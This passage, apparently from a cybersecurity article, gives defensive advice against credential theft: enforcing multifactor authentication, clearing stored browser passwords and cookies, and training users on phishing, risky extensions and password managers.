The second measure is to enforce multifactor authentication (MFA) on all critical systems and services. That way, hackers will be unable to access those resources even if they manage to steal a user's credentials.

Third, regularly clear the browser history on users' machines to erase stored passwords, and to clear their cookies as well, since they can enable attackers to access services such as email without the user's credentials. Ensure your IT teams can perform these tasks remotely and, ideally, automate them.

Fourth, remember the human factor. Be sure to roll out an extensive cybersecurity awareness program that educates all your users about security best practices and why they should follow them. In particular, teach them how to spot phishing emails and why to avoid using browser plug-ins or extensions, especially those that don't receive regular updates. In addition, train them to choose strong and unique passwords for each website they visit and not to store passwords in their browsers; to facilitate this, give them a password management app.

Tag

#apple